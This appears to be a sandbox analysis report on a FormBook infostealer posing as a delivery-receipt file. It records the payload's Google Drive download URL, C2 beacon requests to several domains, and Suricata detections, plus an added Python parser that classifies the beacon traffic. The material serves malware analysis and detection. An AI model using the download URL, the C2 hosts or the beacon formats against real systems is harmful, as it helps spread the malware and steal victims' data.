                      Source: Binary string: easinvoker.pdbGCTL source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.0000000020800000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163345039.0000000021742000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007ED90000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163345039.0000000021771000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000003.2318056683.00000000006A9000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000003.2318056683.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000069E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe; Code function: 0_2_02B258B4 GetModuleHandleA, GetProcAddress, lstrcpynA, lstrcpynA, lstrcpynA, FindFirstFileA, FindClose, lstrlenA, lstrcpynA, lstrlenA, lstrcpynA, 0_2_02B258B4

                      Networking

Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49989 -> 52.223.13.41:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49990 -> 52.223.13.41:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49987 -> 188.114.97.3:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49987 -> 188.114.97.3:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49991 -> 52.223.13.41:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:49996 -> 108.179.193.23:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49996 -> 108.179.193.23:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49994 -> 108.179.193.23:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49991 -> 52.223.13.41:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49993 -> 108.179.193.23:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49988 -> 52.223.13.41:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49995 -> 108.179.193.23:80
Source: Malware configuration extractor; URLs: https://drive.google.com/uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1
Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe; Code function: 0_2_02B3E2F0 InternetCheckConnectionA, 0_2_02B3E2F0
Source: Joe Sandbox View; IP Address: 188.114.97.3
Source: Joe Sandbox View; IP Address: 52.223.13.41
Source: Joe Sandbox View; ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View; ASN Name: AMAZONEXPANSIONGB
Source: Joe Sandbox View; JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 142.250.186.174:443
Source: Network traffic; Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 172.217.16.193:443
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (9 identical alerts)
                      Source: global traffic; HTTP traffic detected: GET /uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com
                      Source: global traffic; HTTP traffic detected: GET /download?id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                      Source: global traffic; HTTP traffic detected: GET /i28d/?yt=LNd8mbFxBhGLQV&TB1lE=HRfyw8S2LmkNqQTdj7e+XySdNCmnttnomENxnEdal27Zyt9OvbxgyEIUd+T7UYt3ulEBayBzfHST035Fo0DtVgaGE1Ztsznh/Pj+8/p9meyljlzEGEhG/wkxevrzOSgU56GIkV0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.marposet.shopConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Source: global traffic; HTTP traffic detected: GET /6rby/?TB1lE=2ivW13goMDZZIIgxIXx+PtmXwvlQP7M8TrIp9IEQgHwuZNQL7M/h+QGYEWAJ9fx4B+FPevpSLI/kijRzPjJx+Yn6WZwPBUitPI+kHM7nbQtU8vpWrajM5+kH6naS6tDsldE5bxs=&yt=LNd8mbFxBhGLQV HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.techforcreators.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Source: global traffic; HTTP traffic detected: GET /htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9GnpCYVVBAJgHuDCTCUS1tunX2/M4ihm7EfJFMVRSEfiRcDq1K8lUuiYdkyOhgpRhKJF9gKDaUZ1llgaIE/O30= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.missvet.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Source: global traffic; DNS traffic detected: DNS query: drive.google.com
                      Source: global traffic; DNS traffic detected: DNS query: drive.usercontent.google.com
                      Source: global traffic; DNS traffic detected: DNS query: www.bellhomehd.shop
                      Source: global traffic; DNS traffic detected: DNS query: www.einpisalpace.shop
                      Source: global traffic; DNS traffic detected: DNS query: www.marposet.shop
                      Source: global traffic; DNS traffic detected: DNS query: www.techforcreators.live
                      Source: global traffic; DNS traffic detected: DNS query: www.missvet.net
                      Source: unknown; HTTP traffic detected: POST /6rby/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.techforcreators.liveOrigin: http://www.techforcreators.liveContent-Length: 210Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheReferer: http://www.techforcreators.live/6rby/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 54 42 31 6c 45 3d 37 67 48 32 32 43 70 43 4b 6b 30 47 4b 4b 31 31 55 31 35 39 46 75 57 66 34 66 49 46 66 4c 49 75 55 5a 4d 35 34 2f 77 38 67 6c 51 30 43 4f 49 64 78 34 6a 67 39 55 6d 56 48 54 59 65 39 50 35 66 49 4e 52 45 58 59 63 2f 4e 34 71 6c 6c 67 56 46 48 67 35 4f 77 6f 54 77 51 61 6b 47 55 55 65 48 4a 4a 6a 55 43 65 61 63 5a 33 35 47 39 50 42 59 6f 50 62 66 78 39 4e 79 77 57 69 6c 6e 73 44 30 75 39 63 7a 55 57 46 30 73 72 61 36 65 73 65 69 42 34 4d 34 56 54 2f 33 48 64 61 68 48 65 6e 52 53 7a 63 4a 45 5a 49 62 54 44 6a 4b 4e 4e 32 6b 4e 39 4b 71 53 69 2b 6c 2b 6a 64 4b 70 63 76 67 38 74 45 32 64 67 6f 49 4f 6d 6a 65 Data Ascii: TB1lE=7gH22CpCKk0GKK11U159FuWf4fIFfLIuUZM54/w8glQ0COIdx4jg9UmVHTYe9P5fINREXYc/N4qllgVFHg5OwoTwQakGUUeHJJjUCeacZ35G9PBYoPbfx9NywWilnsD0u9czUWF0sra6eseiB4M4VT/3HdahHenRSzcJEZIbTDjKNN2kN9KqSi+l+jdKpcvg8tE2dgoIOmje
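The request lines above are exported with their headers run together, which makes them hard to read and to grep. The following Python is an added example, not part of this Joe Sandbox report or of the malware: it splits such lines back into method, path, query string, headers and POST body, then labels each one with the two patterns this report records, namely the stage download from Google Drive under the default User-Agent of the WinHttp.WinHttpRequest COM object, and the FormBook-style beacons (a four-character directory such as /i28d/, /6rby/ or /htux/, a long base64-like blob in the query string or form body, Connection: close, and one Android Chrome 44 User-Agent reused on three unrelated hosts). The sample input is the report's own GET and POST lines (the POST's hex dump shortened) plus one constructed benign request; the 40-character blob threshold and the four-character path rule are this example's heuristics, not a published FormBook specification.

```python
"""Added example (not from the report or the malware): rebuild and label the run-together
"HTTP traffic detected" request lines of a Joe Sandbox export."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Header names seen in this report's request lines; the export has no separator
# between headers, so a header starts wherever "<Name>: " begins.
KNOWN_HEADERS = ("Connection", "Accept", "Accept-Language", "Accept-Encoding", "User-Agent",
                 "Host", "Origin", "Content-Length", "Content-Type", "Cache-Control", "Referer")
_HEADER_START = re.compile("(?:%s): " % "|".join(re.escape(h) for h in KNOWN_HEADERS))
_REQUEST_LINE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]")

# Indicators read off the report: the stage is fetched from Google Drive with the default
# User-Agent of the WinHttp.WinHttpRequest COM object; the beacons use a four-character
# directory, a long base64-like blob, "Connection: close" and one Android Chrome 44
# User-Agent on three unrelated hosts.  The length thresholds are this example's own.
STAGER_HOSTS = {"drive.google.com", "drive.usercontent.google.com"}
WINHTTP_UA = "WinHttp.WinHttpRequest"
BEACON_UA = ("Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36")
_BEACON_PATH = re.compile(r"^/[a-z0-9]{4}/$")
_B64_BLOB = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")
_FORM_BODY = re.compile(r"^[A-Za-z0-9_]+=[A-Za-z0-9+/]{40,}={0,2}$")


@dataclass
class Request:
    method: str
    path: str
    query: Dict[str, str]
    headers: Dict[str, str]
    body: str = ""


def _split_headers(blob: str) -> Dict[str, str]:
    """Cut the header run at every known "<Name>: " boundary."""
    starts = [m.start() for m in _HEADER_START.finditer(blob)] + [len(blob)]
    headers: Dict[str, str] = {}
    for start, end in zip(starts, starts[1:]):
        name, value = blob[start:end].split(": ", 1)
        headers[name] = value.strip()
    return headers


def parse_flat_request(line: str) -> Request:
    """Turn one flattened report line into method, path, query, headers and body."""
    text = line.split("HTTP traffic detected: ", 1)[-1]
    m = _REQUEST_LINE.match(text)
    if not m:
        raise ValueError("not an HTTP request line: %r" % text[:40])
    rest, body = text[m.end():], ""
    if "Data Ascii: " in rest:            # POST entries append the body as hex and as ASCII
        rest, body = rest.split("Data Ascii: ", 1)
    rest = rest.split("Data Raw: ", 1)[0]
    path, _, qs = m.group(2).partition("?")
    query = dict(kv.split("=", 1) for kv in qs.split("&") if "=" in kv)
    return Request(m.group(1), path, query, _split_headers(rest), body.strip())


def classify(req: Request) -> Tuple[str, List[str]]:
    """Return (label, reasons); label is stage-download, formbook-beacon or unclassified."""
    ua, host = req.headers.get("User-Agent", ""), req.headers.get("Host", "")
    if WINHTTP_UA in ua and host in STAGER_HOSTS and req.query.get("export") == "download":
        return "stage-download", ["WinHttpRequest default User-Agent", "Google Drive download URL on " + host]
    reasons: List[str] = []
    path_ok = bool(_BEACON_PATH.match(req.path))
    blob_ok = any(_B64_BLOB.match(v) for v in req.query.values()) or bool(_FORM_BODY.match(req.body))
    if path_ok:
        reasons.append("four-character directory path " + req.path)
    if blob_ok:
        reasons.append("long base64-like blob in query string or form body")
    if req.headers.get("Connection") == "close":
        reasons.append("Connection: close")
    if ua == BEACON_UA:
        reasons.append("Android Chrome 44 User-Agent reused across hosts")
    if path_ok and blob_ok and len(reasons) >= 3:
        return "formbook-beacon", reasons
    return "unclassified", reasons


# Sample input: three lines copied from this report (the POST's hex dump is shortened)
# plus one constructed benign request for contrast.
SAMPLE_LINES = [
    "Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1 HTTP/1.1"
    "Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.google.com",
    "Source: global trafficHTTP traffic detected: GET /i28d/?yt=LNd8mbFxBhGLQV&TB1lE=HRfyw8S2LmkNqQTdj7e+XySdNCmnttnomENxnEdal27Zyt9"
    "OvbxgyEIUd+T7UYt3ulEBayBzfHST035Fo0DtVgaGE1Ztsznh/Pj+8/p9meyljlzEGEhG/wkxevrzOSgU56GIkV0= HTTP/1.1Accept: text/html,application/"
    "xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.marposet.shopConnection: "
    "closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36",
    "Source: unknownHTTP traffic detected: POST /6rby/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,"
    "image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.techforcreators.liveOrigin: http://www."
    "techforcreators.liveContent-Length: 210Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheReferer: "
    "http://www.techforcreators.live/6rby/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36Data Raw: 54 42 31 6c 45 3d 37 67 48 32 32 Data Ascii: TB1lE=7gH22CpCKk0GKK11"
    "U159FuWf4fIFfLIuUZM54/w8glQ0COIdx4jg9UmVHTYe9P5fINREXYc/N4qllgVFHg5OwoTwQakGUUeHJJjUCeacZ35G9PBYoPbfx9NywWilnsD0u9czUWF0sra6eseiB4M4VT/"
    "3HdahHenRSzcJEZIbTDjKNN2kN9KqSi+l+jdKpcvg8tE2dgoIOmje",
    "Source: global trafficHTTP traffic detected: GET /index.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: curl/8.5.0Host: example.com",
]

if __name__ == "__main__":
    for req in map(parse_flat_request, SAMPLE_LINES):
        print(classify(req)[0], req.method, req.headers.get("Host", "") + req.path)
```

Run it directly to print one label per sample line. The same parser works on other report exports of this shape once KNOWN_HEADERS lists every header name that occurs: a name missing from that tuple is silently folded into the preceding header's value, so check the parsed headers before trusting a classification.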
                      Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 09:58:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Sat, 07 Dec 2024 23:09:32 GMTcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rESKkjTNQhj7%2Ftb0d736ct3OjvnL7sCtf04bhnodmVQ6CN5pkciIfU2IHP0TC3hoxkjWeixjTZ2p5RlzrPGN7De9xHJPLa7%2BxasT%2FrVceo6DGvOPeH5E%2BDMWlwAFubmT2PVV6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa12be4cd434321-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1559&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 Data Ascii: 586<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css
                      Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 09:58:56 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockLink: <https://missvet.net/wp-json/>; rel="https://api.w.org/"Vary: Accept-EncodingUpgrade: h2,h2cConnection: UpgradeContent-Encoding: gzipX-Endurance-Cache-Level: 0X-nginx-cache: WordPressContent-Length: 5814Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 52 db 72 db c6 96 7d b6 be a2 85 54 2c 30 c6 8d e0 45 12 25 ca 93 38 ce 54 4e 25 c7 29 db 39 e7 c1 f6 78 9a c0 26 d0 16 d0 8d 74 37 44 d2 8a 3e e6 d4 f9 8b 79 cd 8f cd 6e 80 17 88 02 25 d9 d2 54 8d 4a 82 80 dd 7b af b5 7a ed 75 ba 1f 8b 48 2f 0a 20 a9 ce b3 b3 bd 53 f3 8f 64 94 27 63 ab d0 ee 0f af 2d 53 03 1a 9f ed 3d 39 cd 41 53 12 a5 54 2a d0 63 eb f7 b7 3f b9 47 d6 ba ce 69 0e 63 eb 82 c1 ac 10 52 5b 24 12 5c 03 c7 be 19 8b 75 3a 8e e1 82 45 e0 56 1f 0e 61 9c 69 46 33 57 45 34 83 71 b7 42 c9 18 3f 27 12 32 24 96 62 ca 32 b0 48 2a 61 3a b6 52 ad 0b 35 f2 fd 24 2f 12 4f c8 c4 9f 4f b9 df ad 87 34 d3 19 9c fd f6 d7 bf 12 c6 51 c3 5f ff 16 04 b8 a1 96 34 a6 e4 e9 37 47 61 b7 7b 42 7e 65 8a fc 03 f4 a9 5f b7 ef 35 14 1f 48 31 11 5a 1d ac f5 1e e4 74 ee b2 9c 26 e0 16 12 cc 7d 46 19 95 09 1c 10 df 10 2a bd 40 04 96 27 23 a6 ec 77 8a 7d 06 35 b6 68 a9 85 45 d8 07 87 d4 95 ff aa 4b 8e a9 75 c8 65 85 4d 19 77 19 ea 62 5c b1 c8 35 6d 23 d2 0b 82 a0 98 93 ee a0 fa 77 75 ea d7 e8 4d 33 0e 62 ae 8c 90 29 e8 28 3d a8 1d 39 f0 fd 9c 29 75 01 da e3 a0 2b 61 0d f7 68 a6 41 72 aa d1 3f b3 58 2c 14 45 c6 22 aa 99 e0 be 54 ea d9 3c cf f0 c8 38 31 b6 7e 02 88 49 41 25 5d 79 44 9e 4a fa 47 29 4e b6 cd 6f 10 fa 53 1c f2 ad 07 d3 c6 80 c6 e4 e8 f9 5f ff 92 4c a8 2f 96 81 c3 66 5a 35 f5 a8 48 b2 42 9f ed cd 18 8f c5 cc fb 38 2b 20 17 9f d8 1b d0 9a f1 44 91 31 b9 b4 26 54 c1 ef 32 b3 46 4b d4 f7 fe 7b 5f 79 33 13 ad f7 7e b5 79 f5 1e c1 25 bc f7 ab e1 f7 7e 77 e0 05 5e ef bd 7f 18 ce 0f c3 f7 be e5 58 30 d7 38 ef 15 3c c1 0f 75 91 7c 1d 1e 0e 56 68 f8 ff 65 0d 88 6f e6 5b 94 32 02 6b 74 69 61 72 d0 c2 6a 6c 89 5f c1 37 6c 78 ef cf 0a 0c 56 94 95 b1 e1 f9 a4 aa 42 35 e1 e2 62 00 2f eb e5 8c 7b 9f d4 f3 0b 90 e3 a1 77 e8 75 ad ab ab 93 3d ff bb 7d f2 36 45 bb a7 2c 03 82 ff 4d 64 dd 04 38 48 64 8c c9 77 fe de fe b4 e4 91 59 a0 cd 1c de b9 bc a0 92 08 47 39 70 b2 aa 93 c8 86 ce a5 96 8b ea 4c 8f 2f 55 59 14 42 ea b7 a0 b4 1a 81 a3 59 8e 6f 34 2f 46 36 87 19 f9 11 81 3b de 05 cd 4a 78 35 b5 3b 57 27 0a 94 42 98 37 5a 48 b4 c9 53 a0 7f c6 cb da c2 f9 db 9b 57 7f f7 94 96 b8 34 36 5d d8 ba d3 b9 42 1f a2 d4 d0 5d 5d ad e9 0b 1b 39 8c 34 f0 22 bc aa 7c 0d Data Ascii: Rr}T,0E%8TN%)9x&t7D>yn%TJ{zuH/ Sd'c-S=9AST*c?GicR[$\u:EVaiF3WE4qB?'2$b2H*a:R5$/OO4Q_47Ga{B~e_5H1Zt&}F
                      Note: the same 404 response (identical headers and body; only the Date header differs) was received twice more, at 09:58:59 GMT and 09:59:01 GMT. The Link header identifies the server as the missvet.net WordPress site, the third beacon host above. The body is gzip-compressed (it starts with the 1f 8b 08 magic), so the Data Ascii rendering is compressed bytes, not page text.
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.0000000021741000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.000000002084F000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163668078.000000002179E000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.000000000066E000.00000004.00000020.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000003.2404075127.00000000006C6000.00000004.00000020.00020000.00000000.sdmp; Strings found in binary or memory (one entry per URL):
                          http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                          http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                          http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                          http://crl.comodoca.com/AAACertificateServices.crl04
                          http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                          http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168688246.000000007EC8A000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2230319620.000000007F280000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2226671815.00000000218D6000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2220855651.00000000208A0000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2163163241.000000007ED40000.00000004.00001000.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2168238016.0000000021EE1000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000003.2162990013.000000007EDA3000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 00000007.00000002.2430372024.000000002079A000.00000004.00001000.00020000.00000000.sdmp, Tizelcdh.PIF, 0000000C.00000002.2522133724.00000000208A6000.00000004.00001000.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3369025968.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3372194719.0000000004B9C000.00000004.10000000.00040000.00000000.sdmp, WQzLddwiZR.exe, 00000015.00000000.2753377461.000000000276C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3085974166.00000000193FC000.00000004.80000000.00040000.00000000.sdmp, hdcleziT.pif.0.dr; String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                      Note: these are CRL, issuer-certificate (AIA) and timestamping-CA locations of DigiCert, Sectigo and Comodo, i.e. pieces of a code-signing certificate chain carried in the sample's memory and in the dropped Tizelcdh.PIF / hdcleziT.pif. The trailing "0E", "0C", "04", "0#" and "0r" are not part of the URLs: they are the DER SEQUENCE tag (0x30, ASCII "0") and length byte that follow each string inside the certificate. None of these hosts appears in the DNS queries above; they are not C2 indicators.
